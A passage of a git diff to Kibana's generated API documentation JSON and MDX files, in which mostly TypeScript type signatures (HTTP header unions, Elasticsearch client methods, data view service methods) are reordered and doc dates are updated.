string[] | undefined; age?: string | string[] | undefined; allow?: string | string[] | undefined; \"alt-svc\"?: string | string[] | undefined; authorization?: string | string[] | undefined; \"cache-control\"?: string | string[] | undefined; connection?: string | string[] | undefined; \"content-disposition\"?: string | string[] | undefined; \"content-encoding\"?: string | string[] | undefined; \"content-language\"?: string | string[] | undefined; \"content-length\"?: string | string[] | undefined; \"content-location\"?: string | string[] | undefined; \"content-range\"?: string | string[] | undefined; \"content-type\"?: string | string[] | undefined; cookie?: string | string[] | undefined; date?: string | string[] | undefined; etag?: string | string[] | undefined; expect?: string | string[] | undefined; expires?: string | string[] | undefined; forwarded?: string | string[] | undefined; from?: string | string[] | undefined; host?: string | string[] | undefined; \"if-match\"?: string | string[] | undefined; \"if-modified-since\"?: string | string[] | undefined; \"if-none-match\"?: string | string[] | undefined; \"if-unmodified-since\"?: string | string[] | undefined; \"last-modified\"?: string | string[] | undefined; location?: string | string[] | undefined; origin?: string | string[] | undefined; pragma?: string | string[] | undefined; \"proxy-authenticate\"?: string | string[] | undefined; \"proxy-authorization\"?: string | string[] | undefined; \"public-key-pins\"?: string | string[] | undefined; range?: string | string[] | undefined; referer?: string | string[] | undefined; \"retry-after\"?: string | string[] | undefined; \"sec-websocket-accept\"?: string | string[] | undefined; \"sec-websocket-extensions\"?: string | string[] | undefined; \"sec-websocket-key\"?: string | string[] | undefined; \"sec-websocket-protocol\"?: string | string[] | undefined; \"sec-websocket-version\"?: string | string[] | undefined; \"set-cookie\"?: string | string[] | undefined; 
\"strict-transport-security\"?: string | string[] | undefined; tk?: string | string[] | undefined; trailer?: string | string[] | undefined; \"transfer-encoding\"?: string | string[] | undefined; upgrade?: string | string[] | undefined; \"user-agent\"?: string | string[] | undefined; vary?: string | string[] | undefined; via?: string | string[] | undefined; warning?: string | string[] | undefined; \"www-authenticate\"?: string | string[] | undefined; } & { [header: string]: string | string[] | undefined; }" ], "path": "node_modules/@types/kbn__core-http-server/index.d.ts", "deprecated": false, @@ -38643,7 +38643,7 @@ "\nRoute options: If 'GET' or 'OPTIONS' method, body options won't be returned." ], "signature": [ - "Method extends \"options\" | \"get\" ? Required, \"body\">> : Required<", "RouteConfigOptions", 
@@ -38719,7 +38719,7 @@ "\nSet of well-known HTTP headers." ], "signature": [ - "\"from\" | \"origin\" | \"warning\" | \"location\" | \"date\" | \"expires\" | \"range\" | \"allow\" | \"accept\" | \"host\" | \"etag\" | \"authorization\" | \"accept-language\" | \"accept-patch\" | \"accept-ranges\" | \"access-control-allow-credentials\" | \"access-control-allow-headers\" | \"access-control-allow-methods\" | \"access-control-allow-origin\" | \"access-control-expose-headers\" | \"access-control-max-age\" | \"access-control-request-headers\" | \"access-control-request-method\" | \"age\" | \"alt-svc\" | \"cache-control\" | \"connection\" | \"content-disposition\" | \"content-encoding\" | \"content-language\" | \"content-length\" | \"content-location\" | \"content-range\" | \"content-type\" | \"cookie\" | \"expect\" | \"forwarded\" | \"if-match\" | \"if-modified-since\" | \"if-none-match\" | \"if-unmodified-since\" | \"last-modified\" | \"pragma\" | \"proxy-authenticate\" | \"proxy-authorization\" | \"public-key-pins\" | \"referer\" | \"retry-after\" | \"sec-websocket-accept\" | \"sec-websocket-extensions\" | \"sec-websocket-key\" | \"sec-websocket-protocol\" | \"sec-websocket-version\" | \"set-cookie\" | \"strict-transport-security\" | \"tk\" | \"trailer\" | \"transfer-encoding\" | \"upgrade\" | \"user-agent\" | \"vary\" | \"via\" | \"www-authenticate\"" + "\"accept\" | \"accept-language\" | \"accept-patch\" | \"accept-ranges\" | \"access-control-allow-credentials\" | \"access-control-allow-headers\" | \"access-control-allow-methods\" | \"access-control-allow-origin\" | \"access-control-expose-headers\" | \"access-control-max-age\" | \"access-control-request-headers\" | \"access-control-request-method\" | \"age\" | \"allow\" | \"alt-svc\" | \"authorization\" | \"cache-control\" | \"connection\" | \"content-disposition\" | \"content-encoding\" | \"content-language\" | \"content-length\" | \"content-location\" | \"content-range\" | \"content-type\" | \"cookie\" | \"date\" | 
\"etag\" | \"expect\" | \"expires\" | \"forwarded\" | \"from\" | \"host\" | \"if-match\" | \"if-modified-since\" | \"if-none-match\" | \"if-unmodified-since\" | \"last-modified\" | \"location\" | \"origin\" | \"pragma\" | \"proxy-authenticate\" | \"proxy-authorization\" | \"public-key-pins\" | \"range\" | \"referer\" | \"retry-after\" | \"sec-websocket-accept\" | \"sec-websocket-extensions\" | \"sec-websocket-key\" | \"sec-websocket-protocol\" | \"sec-websocket-version\" | \"set-cookie\" | \"strict-transport-security\" | \"tk\" | \"trailer\" | \"transfer-encoding\" | \"upgrade\" | \"user-agent\" | \"vary\" | \"via\" | \"warning\" | \"www-authenticate\"" ], "path": "node_modules/@types/kbn__core-http-server/index.d.ts", "deprecated": false, @@ -39402,9 +39402,9 @@ "\nA sub-set of {@link UiSettingsParams} exposed to the client-side." ], "signature": [ - "{ metric?: { type: string; name: string; } | undefined; type?: ", + "{ options?: string[] | number[] | undefined; type?: ", "UiSettingsType", - " | undefined; name?: string | undefined; order?: number | undefined; value?: unknown; description?: string | undefined; options?: number[] | string[] | undefined; category?: string[] | undefined; optionLabels?: Record | undefined; requiresPageReload?: boolean | undefined; readonly?: boolean | undefined; sensitive?: boolean | undefined; deprecation?: ", + " | undefined; metric?: { type: string; name: string; } | undefined; value?: unknown; description?: string | undefined; name?: string | undefined; order?: number | undefined; category?: string[] | undefined; optionLabels?: Record | undefined; requiresPageReload?: boolean | undefined; readonly?: boolean | undefined; sensitive?: boolean | undefined; deprecation?: ", "DeprecationSettings", " | undefined; }" ], 
@@ -39639,7 +39639,7 @@ "\nHttp response headers to set." ], "signature": [ - "Record<\"from\" | \"origin\" | \"warning\" | \"location\" | \"date\" | \"expires\" | \"range\" | \"allow\" | \"accept\" | \"host\" | \"etag\" | \"authorization\" | \"accept-language\" | \"accept-patch\" | \"accept-ranges\" | \"access-control-allow-credentials\" | \"access-control-allow-headers\" | \"access-control-allow-methods\" | \"access-control-allow-origin\" | \"access-control-expose-headers\" | \"access-control-max-age\" | \"access-control-request-headers\" | \"access-control-request-method\" | \"age\" | \"alt-svc\" | \"cache-control\" | \"connection\" | \"content-disposition\" | \"content-encoding\" | \"content-language\" | \"content-length\" | \"content-location\" | \"content-range\" | \"content-type\" | \"cookie\" | \"expect\" | \"forwarded\" | \"if-match\" | \"if-modified-since\" | \"if-none-match\" | \"if-unmodified-since\" | \"last-modified\" | \"pragma\" | \"proxy-authenticate\" | \"proxy-authorization\" | \"public-key-pins\" | \"referer\" | \"retry-after\" | \"sec-websocket-accept\" | \"sec-websocket-extensions\" | \"sec-websocket-key\" | \"sec-websocket-protocol\" | \"sec-websocket-version\" | \"set-cookie\" | \"strict-transport-security\" | \"tk\" | \"trailer\" | \"transfer-encoding\" | \"upgrade\" | \"user-agent\" | \"vary\" | \"via\" | \"www-authenticate\", string | string[]> | Record" + "Record<\"accept\" | \"accept-language\" | \"accept-patch\" | \"accept-ranges\" | \"access-control-allow-credentials\" | \"access-control-allow-headers\" | \"access-control-allow-methods\" | \"access-control-allow-origin\" | \"access-control-expose-headers\" | \"access-control-max-age\" | \"access-control-request-headers\" | \"access-control-request-method\" | \"age\" | \"allow\" | \"alt-svc\" | \"authorization\" | \"cache-control\" | \"connection\" | \"content-disposition\" | \"content-encoding\" | \"content-language\" | \"content-length\" | \"content-location\" | \"content-range\" | 
\"content-type\" | \"cookie\" | \"date\" | \"etag\" | \"expect\" | \"expires\" | \"forwarded\" | \"from\" | \"host\" | \"if-match\" | \"if-modified-since\" | \"if-none-match\" | \"if-unmodified-since\" | \"last-modified\" | \"location\" | \"origin\" | \"pragma\" | \"proxy-authenticate\" | \"proxy-authorization\" | \"public-key-pins\" | \"range\" | \"referer\" | \"retry-after\" | \"sec-websocket-accept\" | \"sec-websocket-extensions\" | \"sec-websocket-key\" | \"sec-websocket-protocol\" | \"sec-websocket-version\" | \"set-cookie\" | \"strict-transport-security\" | \"tk\" | \"trailer\" | \"transfer-encoding\" | \"upgrade\" | \"user-agent\" | \"vary\" | \"via\" | \"warning\" | \"www-authenticate\", string | string[]> | Record" ], "path": "node_modules/@types/kbn__core-http-server/index.d.ts", "deprecated": false, @@ -39671,9 +39671,9 @@ "\nThe set of common HTTP methods supported by Kibana routing." ], "signature": [ - "DestructiveRouteMethod", + "SafeRouteMethod", " | ", - "SafeRouteMethod" + "DestructiveRouteMethod" ], "path": "node_modules/@types/kbn__core-http-server/index.d.ts", "deprecated": false, @@ -39880,7 +39880,7 @@ "\nSet of HTTP methods not changing the state of the server." ], "signature": [ - "\"options\" | \"get\"" + "\"get\" | \"options\"" ], "path": "node_modules/@types/kbn__core-http-server/index.d.ts", "deprecated": false, diff --git a/api_docs/core.mdx b/api_docs/core.mdx index 36030a74bfe62..031ce073990c9 100644 --- a/api_docs/core.mdx +++ b/api_docs/core.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/core title: "core" image: https://source.unsplash.com/400x175/?github description: API docs for the core plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'core'] --- import coreObj from './core.devdocs.json'; diff --git a/api_docs/core_application.devdocs.json b/api_docs/core_application.devdocs.json index 00b0c241fac11..30eaa3462a34a 100644 --- a/api_docs/core_application.devdocs.json 
+++ b/api_docs/core_application.devdocs.json @@ -2168,7 +2168,7 @@ "section": "def-public.AppStatus", "text": "AppStatus" }, - " | undefined; tooltip?: string | undefined; searchable?: boolean | undefined; deepLinks?: ", + " | undefined; searchable?: boolean | undefined; deepLinks?: ", { "pluginId": "core", "scope": "public", @@ -2184,7 +2184,7 @@ "section": "def-public.AppNavLinkStatus", "text": "AppNavLinkStatus" }, - " | undefined; defaultPath?: string | undefined; }" + " | undefined; defaultPath?: string | undefined; tooltip?: string | undefined; }" ], "path": "src/core/public/application/types.ts", "deprecated": false, diff --git a/api_docs/core_application.mdx b/api_docs/core_application.mdx index ca13e640edaea..a36996fbf1b26 100644 --- a/api_docs/core_application.mdx +++ b/api_docs/core_application.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/core-application title: "core.application" image: https://source.unsplash.com/400x175/?github description: API docs for the core.application plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'core.application'] --- import coreApplicationObj from './core_application.devdocs.json'; diff --git a/api_docs/core_chrome.devdocs.json b/api_docs/core_chrome.devdocs.json index f7ad640b55bb7..a1c6878eef063 100644 --- a/api_docs/core_chrome.devdocs.json +++ b/api_docs/core_chrome.devdocs.json 
@@ -1912,7 +1912,7 @@ "signature": [ "React.HTMLAttributes & ", "CommonProps", - " & { href?: string | undefined; onClick?: React.MouseEventHandler | undefined; text: React.ReactNode; truncate?: boolean | undefined; color?: \"primary\" | \"success\" | \"accent\" | \"warning\" | \"danger\" | \"text\" | \"subdued\" | \"ghost\" | undefined; 'aria-current'?: boolean | \"true\" | \"false\" | \"page\" | \"step\" | \"location\" | \"date\" | \"time\" | undefined; }" + " & { href?: string | undefined; onClick?: React.MouseEventHandler | undefined; text: React.ReactNode; truncate?: boolean | undefined; color?: \"warning\" | \"subdued\" | \"primary\" | \"accent\" | \"success\" | \"danger\" | \"text\" | \"ghost\" | undefined; 'aria-current'?: boolean | \"date\" | \"location\" | \"time\" | \"page\" | \"false\" | \"true\" | \"step\" | undefined; }" ], "path": "src/core/public/chrome/types.ts", "deprecated": false, @@ -1926,9 +1926,9 @@ "label": "ChromeHelpExtensionLinkBase", "description": [], "signature": [ - "{ target?: string | (string & {}) | undefined; 'data-test-subj'?: string | undefined; iconType?: ", + "{ iconType?: ", "IconType", - " | undefined; rel?: string | undefined; }" + " | undefined; 'data-test-subj'?: string | undefined; rel?: string | undefined; target?: string | (string & {}) | undefined; }" ], "path": "src/core/public/chrome/ui/header/header_help_menu.tsx", "deprecated": false, diff --git a/api_docs/core_chrome.mdx b/api_docs/core_chrome.mdx index a453a168f21ab..e8d295e6cf83a 100644 --- a/api_docs/core_chrome.mdx +++ b/api_docs/core_chrome.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/core-chrome title: "core.chrome" image: https://source.unsplash.com/400x175/?github description: API docs for the core.chrome plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'core.chrome'] --- import coreChromeObj from './core_chrome.devdocs.json'; 
diff --git a/api_docs/core_saved_objects.mdx b/api_docs/core_saved_objects.mdx index a190642c1a49d..f17193f0d4c23 100644 --- a/api_docs/core_saved_objects.mdx +++ b/api_docs/core_saved_objects.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/core-savedObjects title: "core.savedObjects" image: https://source.unsplash.com/400x175/?github description: API docs for the core.savedObjects plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'core.savedObjects'] --- import coreSavedObjectsObj from './core_saved_objects.devdocs.json'; diff --git a/api_docs/custom_integrations.devdocs.json b/api_docs/custom_integrations.devdocs.json index c6b9ecd132fea..a56430796e324 100644 --- a/api_docs/custom_integrations.devdocs.json +++ b/api_docs/custom_integrations.devdocs.json @@ -413,7 +413,7 @@ "label": "shipper", "description": [], "signature": [ - "\"other\" | \"beats\" | \"enterprise_search\" | \"language_clients\" | \"sample_data\" | \"tests\" | \"tutorial\" | \"placeholders\"" + "\"beats\" | \"enterprise_search\" | \"language_clients\" | \"other\" | \"sample_data\" | \"tests\" | \"tutorial\" | \"placeholders\"" ], "path": "src/plugins/custom_integrations/common/index.ts", "deprecated": false @@ -685,7 +685,7 @@ "label": "shipper", "description": [], "signature": [ - "\"other\" | \"beats\" | \"enterprise_search\" | \"language_clients\" | \"sample_data\" | \"tests\" | \"tutorial\" | \"placeholders\"" + "\"beats\" | \"enterprise_search\" | \"language_clients\" | \"other\" | \"sample_data\" | \"tests\" | \"tutorial\" | \"placeholders\"" ], "path": "src/plugins/custom_integrations/common/index.ts", "deprecated": false 
@@ -877,7 +877,7 @@ "\nThe list of all known shippers." ], "signature": [ - "(\"other\" | \"beats\" | \"enterprise_search\" | \"language_clients\" | \"sample_data\" | \"tests\" | \"tutorial\" | \"placeholders\")[]" + "(\"beats\" | \"enterprise_search\" | \"language_clients\" | \"other\" | \"sample_data\" | \"tests\" | \"tutorial\" | \"placeholders\")[]" ], "path": "src/plugins/custom_integrations/common/index.ts", "deprecated": false, @@ -893,7 +893,7 @@ "\nA shipper-- an internal or external system capable of storing data in ES/Kibana-- applicable to an Integration." ], "signature": [ - "\"other\" | \"beats\" | \"enterprise_search\" | \"language_clients\" | \"sample_data\" | \"tests\" | \"tutorial\" | \"placeholders\"" + "\"beats\" | \"enterprise_search\" | \"language_clients\" | \"other\" | \"sample_data\" | \"tests\" | \"tutorial\" | \"placeholders\"" ], "path": "src/plugins/custom_integrations/common/index.ts", "deprecated": false, diff --git a/api_docs/custom_integrations.mdx b/api_docs/custom_integrations.mdx index b91514379156a..e286dd8c873b1 100644 --- a/api_docs/custom_integrations.mdx +++ b/api_docs/custom_integrations.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/customIntegrations title: "customIntegrations" image: https://source.unsplash.com/400x175/?github description: API docs for the customIntegrations plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'customIntegrations'] --- import customIntegrationsObj from './custom_integrations.devdocs.json'; diff --git a/api_docs/dashboard.devdocs.json b/api_docs/dashboard.devdocs.json index 01decee7cd29b..32fc71a5d5c4c 100644 --- a/api_docs/dashboard.devdocs.json +++ b/api_docs/dashboard.devdocs.json 
@@ -2190,7 +2190,7 @@ "section": "def-common.RawSavedDashboardPanel730ToLatest", "text": "RawSavedDashboardPanel730ToLatest" }, - ", \"type\" | \"version\" | \"title\" | \"panelIndex\" | \"gridData\" | \"embeddableConfig\" | \"panelRefName\"> & { readonly id?: string | undefined; readonly type: string; }" + ", \"type\" | \"title\" | \"panelIndex\" | \"gridData\" | \"version\" | \"embeddableConfig\" | \"panelRefName\"> & { readonly id?: string | undefined; readonly type: string; }" ], "path": "src/plugins/dashboard/common/types.ts", "deprecated": false, @@ -2849,7 +2849,7 @@ "signature": [ "Pick<", "RawSavedDashboardPanel640To720", - ", \"version\" | \"title\" | \"panelIndex\" | \"gridData\" | \"embeddableConfig\"> & { readonly type?: string | undefined; readonly name?: string | undefined; panelIndex: string; panelRefName?: string | undefined; }" + ", \"title\" | \"panelIndex\" | \"gridData\" | \"version\" | \"embeddableConfig\"> & { readonly type?: string | undefined; readonly name?: string | undefined; panelIndex: string; panelRefName?: string | undefined; }" ], "path": "src/plugins/dashboard/common/bwc/types.ts", "deprecated": false, @@ -2865,7 +2865,7 @@ "signature": [ "Pick<", "RawSavedDashboardPanel610", - ", \"version\" | \"title\" | \"columns\" | \"sort\" | \"panelIndex\" | \"gridData\"> & { readonly id: string; readonly type: string; }" + ", \"columns\" | \"title\" | \"sort\" | \"panelIndex\" | \"gridData\" | \"version\"> & { readonly id: string; readonly type: string; }" ], "path": "src/plugins/dashboard/common/types.ts", "deprecated": false, 
@@ -2881,7 +2881,7 @@ "signature": [ "Pick<", "RawSavedDashboardPanel620", - ", \"version\" | \"title\" | \"columns\" | \"sort\" | \"panelIndex\" | \"gridData\" | \"embeddableConfig\"> & { readonly id: string; readonly type: string; }" + ", \"columns\" | \"title\" | \"sort\" | \"panelIndex\" | \"gridData\" | \"version\" | \"embeddableConfig\"> & { readonly id: string; readonly type: string; }" ], "path": "src/plugins/dashboard/common/types.ts", "deprecated": false, @@ -2897,7 +2897,7 @@ "signature": [ "Pick<", "RawSavedDashboardPanel620", - ", \"version\" | \"title\" | \"columns\" | \"sort\" | \"panelIndex\" | \"gridData\" | \"embeddableConfig\"> & { readonly id: string; readonly type: string; }" + ", \"columns\" | \"title\" | \"sort\" | \"panelIndex\" | \"gridData\" | \"version\" | \"embeddableConfig\"> & { readonly id: string; readonly type: string; }" ], "path": "src/plugins/dashboard/common/types.ts", "deprecated": false, @@ -2913,7 +2913,7 @@ "signature": [ "Pick<", "RawSavedDashboardPanel640To720", - ", \"version\" | \"title\" | \"panelIndex\" | \"gridData\" | \"embeddableConfig\"> & { readonly id: string; readonly type: string; }" + ", \"title\" | \"panelIndex\" | \"gridData\" | \"version\" | \"embeddableConfig\"> & { readonly id: string; readonly type: string; }" ], "path": "src/plugins/dashboard/common/types.ts", "deprecated": false, @@ -2935,7 +2935,7 @@ "section": "def-common.RawSavedDashboardPanel730ToLatest", "text": "RawSavedDashboardPanel730ToLatest" }, - ", \"type\" | \"version\" | \"title\" | \"panelIndex\" | \"gridData\" | \"embeddableConfig\" | \"panelRefName\"> & { readonly id?: string | undefined; readonly type: string; }" + ", \"type\" | \"title\" | \"panelIndex\" | \"gridData\" | \"version\" | \"embeddableConfig\" | \"panelRefName\"> & { readonly id?: string | undefined; readonly type: string; }" ], "path": "src/plugins/dashboard/common/types.ts", "deprecated": false, 
@@ -2951,7 +2951,7 @@ "signature": [ "Pick<", "RawSavedDashboardPanelTo60", - ", \"title\" | \"row\" | \"columns\" | \"sort\" | \"size_x\" | \"size_y\" | \"col\" | \"panelIndex\"> & { readonly id: string; readonly type: string; }" + ", \"columns\" | \"title\" | \"sort\" | \"size_x\" | \"size_y\" | \"row\" | \"col\" | \"panelIndex\"> & { readonly id: string; readonly type: string; }" ], "path": "src/plugins/dashboard/common/types.ts", "deprecated": false, diff --git a/api_docs/dashboard.mdx b/api_docs/dashboard.mdx index a7001b2c0641d..fcfebd40433be 100644 --- a/api_docs/dashboard.mdx +++ b/api_docs/dashboard.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/dashboard title: "dashboard" image: https://source.unsplash.com/400x175/?github description: API docs for the dashboard plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'dashboard'] --- import dashboardObj from './dashboard.devdocs.json'; diff --git a/api_docs/dashboard_enhanced.mdx b/api_docs/dashboard_enhanced.mdx index 2277f7db3f0e7..1f2c997f417a4 100644 --- a/api_docs/dashboard_enhanced.mdx +++ b/api_docs/dashboard_enhanced.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/dashboardEnhanced title: "dashboardEnhanced" image: https://source.unsplash.com/400x175/?github description: API docs for the dashboardEnhanced plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'dashboardEnhanced'] --- import dashboardEnhancedObj from './dashboard_enhanced.devdocs.json'; diff --git a/api_docs/data.devdocs.json b/api_docs/data.devdocs.json index 8cafd5f1b0a98..78c8f4c0dec76 100644 --- a/api_docs/data.devdocs.json +++ b/api_docs/data.devdocs.json 
@@ -8400,9 +8400,9 @@ "section": "def-common.IAggType", "text": "IAggType" }, - "; id?: string | undefined; enabled?: boolean | undefined; params?: {} | ", + "; params?: {} | ", "SerializableRecord", - " | undefined; schema?: string | undefined; }" + " | undefined; id?: string | undefined; enabled?: boolean | undefined; schema?: string | undefined; }" ], "path": "src/plugins/data/common/search/aggs/agg_config.ts", "deprecated": false, @@ -14855,7 +14855,61 @@ "label": "elasticsearchClient", "description": [], "signature": [ - "{ name: string | symbol; transform: ", + "{ get: { (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "GetResponse", + ">; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "GetResponse", + ", unknown>>; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "GetResponse", + ">; }; delete: { (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "WriteResponseBase", + ">; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "WriteResponseBase", + ", unknown>>; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "WriteResponseBase", + ">; }; cluster: ", + "default", + "; eql: ", "default", "; search: { >; }; cluster: ", - "default", - "; eql: ", - "default", - "; create: { (this: That, params: ", + ">; }; create: { (this: That, params: ", "CreateRequest", " | ", "CreateRequest", 
@@ -14923,7 +14973,7 @@ "default", "; security: ", "default", - "; index: { (this: That, params: ", + "; name: string | symbol; index: { (this: That, params: ", "IndexRequest", " | ", "IndexRequest", @@ -14949,33 +14999,7 @@ "TransportRequestOptions", " | undefined): Promise<", "WriteResponseBase", - ">; }; get: { (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "GetResponse", - ">; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "GetResponse", - ", unknown>>; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "GetResponse", - ">; }; update: { (this: That, params: ", + ">; }; update: { (this: That, params: ", "UpdateRequest", " | ", "UpdateRequest", 
@@ -15001,33 +15025,7 @@ "TransportRequestOptions", " | undefined): Promise<", "UpdateResponse", - ">; }; delete: { (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "WriteResponseBase", - ">; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "WriteResponseBase", - ", unknown>>; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "WriteResponseBase", - ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", + ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; 
[kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", "default", "; helpers: ", "default", @@ -15987,6 +15985,8 @@ "TermvectorsResponse", ">; }; textStructure: ", "default", + "; transform: ", + "default", "; updateByQuery: { (this: That, params: ", "UpdateByQueryRequest", " | ", @@ -23112,23 +23112,23 @@ "\nData views service interface" ], "signature": [ - "{ create: ({ id, name, title, ...restOfSpec }: ", + "{ get: (id: string) => Promise<", { "pluginId": "dataViews", "scope": "common", "docId": "kibDataViewsPluginApi", - "section": "def-common.DataViewSpec", - "text": "DataViewSpec" + "section": "def-common.DataView", + "text": "DataView" }, - ", skipFetchFields?: boolean) => Promise<", + ">; delete: (indexPatternId: string) => Promise<{}>; create: ({ id, name, title, ...restOfSpec }: ", { "pluginId": "dataViews", "scope": "common", "docId": "kibDataViewsPluginApi", - "section": "def-common.DataView", - "text": "DataView" + "section": "def-common.DataViewSpec", + "text": "DataViewSpec" }, - ">; find: (search: string, size?: number) => Promise<", + ", skipFetchFields?: boolean) => Promise<", { "pluginId": "dataViews", "scope": "common", @@ -23136,7 +23136,7 @@ "section": "def-common.DataView", "text": "DataView" }, - "[]>; get: (id: string) => Promise<", + ">; find: (search: string, size?: number) => Promise<", { "pluginId": "dataViews", "scope": "common", 
@@ -23144,7 +23144,7 @@ "section": "def-common.DataView", "text": "DataView" }, - ">; delete: (indexPatternId: string) => Promise<{}>; getCanSave: () => Promise; getIds: (refresh?: boolean) => Promise; getTitles: (refresh?: boolean) => Promise; getIdsWithTitle: (refresh?: boolean) => Promise<", + "[]>; getCanSave: () => Promise; getIds: (refresh?: boolean) => Promise; getTitles: (refresh?: boolean) => Promise; getIdsWithTitle: (refresh?: boolean) => Promise<", { "pluginId": "dataViews", "scope": "common", diff --git a/api_docs/data.mdx b/api_docs/data.mdx index 99a784080a5a7..24ce86ff562cc 100644 --- a/api_docs/data.mdx +++ b/api_docs/data.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/data title: "data" image: https://source.unsplash.com/400x175/?github description: API docs for the data plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'data'] --- import dataObj from './data.devdocs.json'; diff --git a/api_docs/data_query.mdx b/api_docs/data_query.mdx index a7e1053e04d8f..a37df6f5d0325 100644 --- a/api_docs/data_query.mdx +++ b/api_docs/data_query.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/data-query title: "data.query" image: https://source.unsplash.com/400x175/?github description: API docs for the data.query plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'data.query'] --- import dataQueryObj from './data_query.devdocs.json'; diff --git a/api_docs/data_search.devdocs.json b/api_docs/data_search.devdocs.json index 3dd21221f9afe..e767c6ed77ed2 100644 --- a/api_docs/data_search.devdocs.json +++ b/api_docs/data_search.devdocs.json 
@@ -349,15 +349,15 @@ "\nSearch sessions SO CRUD\n{@link ISessionsClient}" ], "signature": [ - "{ create: ({ name, appId, locatorId, initialState, restoreState, sessionId, }: { name: string; appId: string; locatorId: string; initialState: Record; restoreState: Record; sessionId: string; }) => Promise<", + "{ get: (sessionId: string) => Promise<", + "SearchSessionSavedObject", + ">; delete: (sessionId: string) => Promise; create: ({ name, appId, locatorId, initialState, restoreState, sessionId, }: { name: string; appId: string; locatorId: string; initialState: Record; restoreState: Record; sessionId: string; }) => Promise<", "SearchSessionSavedObject", ">; find: (options: Omit<", "SavedObjectsFindOptions", ", \"type\">) => Promise<", "SavedObjectsFindResponse", - ">; get: (sessionId: string) => Promise<", - "SearchSessionSavedObject", - ">; update: (sessionId: string, attributes: unknown) => Promise<", + ">; update: (sessionId: string, attributes: unknown) => Promise<", "SavedObjectsUpdateResponse", "<", { @@ -387,7 +387,7 @@ 